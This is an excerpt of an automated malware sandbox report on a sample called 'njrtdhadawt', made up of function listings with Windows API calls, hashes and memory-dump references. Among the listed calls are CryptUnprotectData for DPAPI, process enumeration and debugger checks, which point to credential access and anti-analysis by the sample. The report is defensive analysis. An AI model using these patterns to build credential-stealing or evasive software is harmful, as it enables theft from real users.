                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1799959500-0
                                                                                                                                                                                                                                                          • Opcode ID: 85a3f9489a0df32c9959e5ded4d8cdb0f71a92bfe076b1737f891084f74fca8c
                                                                                                                                                                                                                                                          • Instruction ID: 5e3511a8d88a406d1c2caee4f8d644a8f996548cc73c0e97842581a52bed4e30
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85a3f9489a0df32c9959e5ded4d8cdb0f71a92bfe076b1737f891084f74fca8c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE018C3190412E9FEB719F64AC08BEE7AB8AF05300F0080E5EA09E3184DAB48B41DF61
                                                                                                                                                                                                                                                          Function 0100AB6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0100B1D5,?,01007F86,?,000000BC,?), ref: 0100ABAB
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0100B1D5,?,01007F86,?,000000BC,?), ref: 0100ABD4
                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,0100B1D5,?,01007F86,?,000000BC,?), ref: 0100ABE8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                          • Opcode ID: fef6d2212b98e5f859497d40cd3077ca1c6b020bca395c0eccf3e13f297fcb14
                                                                                                                                                                                                                                                          • Instruction ID: 2d22fefb8956433e8e8cf13d1cb9c8e97df275c76f63d6300999ee21dab05a6f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fef6d2212b98e5f859497d40cd3077ca1c6b020bca395c0eccf3e13f297fcb14
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F01D831704B0BFAFB739B55EC05F9A37EAAF01374F100499F681E60C2E764CA41A654
                                                                                                                                                                                                                                                          Function 6CD515E0 Relevance: 7.8, APIs: 5, Instructions: 258COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,6CD5144F,?,00001000,?,6CD4981A,FFFFFFFF,?,6CD5144F,?,?), ref: 6CD51645
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000,?,6CD5144F), ref: 6CD51675
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,00000001,6CD5144F,00000000,?,6CD5144F), ref: 6CD516C6
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6CD5144F), ref: 6CD518E3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3036337926-0
                                                                                                                                                                                                                                                          • Opcode ID: c0bdd2988121c23dcc74e11db2a1f075ef1939fd1c3cb9335469458dcae7d954
                                                                                                                                                                                                                                                          • Instruction ID: e502d7e61cba89f25dd038c43e37a0c2b1bdbb12a58021f7efaa855c00a4c04b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0bdd2988121c23dcc74e11db2a1f075ef1939fd1c3cb9335469458dcae7d954
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02917A309287816AFB124F38D8017AAFB68AFD3384F54D71EF698728A0FB31C5958715
                                                                                                                                                                                                                                                          Function 6CD5390E Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: \u$\u${${$}$}
                                                                                                                                                                                                                                                          • API String ID: 0-582841131
                                                                                                                                                                                                                                                          • Opcode ID: 2bbc80fab093bc2304ffffcdd14150d825846d3a58e3c70a3df44792b39cf733
                                                                                                                                                                                                                                                          • Instruction ID: b719becf2e75954d8a5c1c3911c0a5e00ef546c1d0e12da5883f6435ae0d3525
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bbc80fab093bc2304ffffcdd14150d825846d3a58e3c70a3df44792b39cf733
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22417E27D1A7CED5CB018BB484602AEBFB26FD6204F5D429AC4D81F382D3358157D3A5
                                                                                                                                                                                                                                                          Function 00FFCAB4 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00FFCEEC
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FFCF01
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(01012344), ref: 00FFCF0C
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00FFCF28
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00FFCF2F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                                                          • Opcode ID: 3153ac94b871d0b32febdfd22bd73f40028c47d62ba50007afd5d0807a93b4be
                                                                                                                                                                                                                                                          • Instruction ID: 42ea4f3300f4f501c0178c6bd302a036f7ba9653266b07cffdbe3a6f38751403
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3153ac94b871d0b32febdfd22bd73f40028c47d62ba50007afd5d0807a93b4be
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D2103B880020ACFD332DF65F5847987BB4FB09310F40846AE69887359DBBE69809F91
                                                                                                                                                                                                                                                          Function 6CD4ED70 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 6CD4F03E
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressSingleWake
                                                                                                                                                                                                                                                          • String ID: <unnamed>$Box<dyn Any>aborting due to panic at $main
                                                                                                                                                                                                                                                          • API String ID: 3114109732-896199136
                                                                                                                                                                                                                                                          • Opcode ID: 88c682cc5ddd243fae4807124f125fa07f28134be6b53f88adc7c657c2767b4e
                                                                                                                                                                                                                                                          • Instruction ID: 8f0f54f73a4a3661ecdacdb2b71ce2af5addd4762d851b75f5fdb8ee68ebaa1d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88c682cc5ddd243fae4807124f125fa07f28134be6b53f88adc7c657c2767b4e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FD11674600A40DFE721CF29C484B52B7F1BB49308F14896EDA9A8BFA1D735E549CBA0
                                                                                                                                                                                                                                                          Function 00FE86EF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00FE8889), ref: 00FE8712
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00FE8889,?,?,00FE8889,00FECD1F,?,?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE8726
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00FECD1F,?,?,00FE8889,00FECD1F,?,?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE874B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                          • String ID: DPAPI
                                                                                                                                                                                                                                                          • API String ID: 2068576380-1690256801
                                                                                                                                                                                                                                                          • Opcode ID: 3971597dd6902e61427a960acd39a2e1f93afc510a432da766ca24f4d340c305
                                                                                                                                                                                                                                                          • Instruction ID: 01ba69df9bf7ffd75cea9747ffdf0f525605cfad4e63cd4adfd09bc189e09f00
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3971597dd6902e61427a960acd39a2e1f93afc510a432da766ca24f4d340c305
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A801FF75A01218AFCB10DFA8D88899EBBF9FF48754B204065EA05E7344D7709E41CB90
                                                                                                                                                                                                                                                          Function 00FFBA48 Relevance: 6.1, APIs: 4, Instructions: 98timeCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,771A83C0,00000000,?,?,?,?,?,?,00FFC011,?,00FF7104,?), ref: 00FFBA9B
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00FFC011,?,00FF7104), ref: 00FFBACB
                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,00FFC011,?,00FF7104,?), ref: 00FFBAF7
                                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00FFC011,?,00FF7104,?), ref: 00FFBB05
                                                                                                                                                                                                                                                            • Part of subcall function 00FFB413: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 00FFB447
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3986731826-0
                                                                                                                                                                                                                                                          • Opcode ID: 01c6605a02e174fafbcbf8f26dbc5474438c35dd126e3a9a41fed5ff3918d791
                                                                                                                                                                                                                                                          • Instruction ID: e850e3b99715cc51abc97470be9b00da03fee2bcf97378970aa032dc2d348f62
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01c6605a02e174fafbcbf8f26dbc5474438c35dd126e3a9a41fed5ff3918d791
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB419271800209DFCF21DF69C880AAEBBF8FF49310F14016AE955EB26AE3359945DF60
                                                                                                                                                                                                                                                          Function 6CD611FD Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6CD61209
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6CD612D5
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CD612EE
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6CD612F8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                          • Opcode ID: 5e8286fee28d93bbd763d754617b24f5d602a495219b929886619e5ca6740fcd
                                                                                                                                                                                                                                                          • Instruction ID: ba6b7cfeade0003c845500a2b3edccacea89ffd84d6ec8716efb612e98f2107c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8286fee28d93bbd763d754617b24f5d602a495219b929886619e5ca6740fcd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 993126B5D01229DBDF21DFA5C9897CDBBF8AF08304F1041AAE50DAB650EB709A84CF54
                                                                                                                                                                                                                                                          Function 00FF2080 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
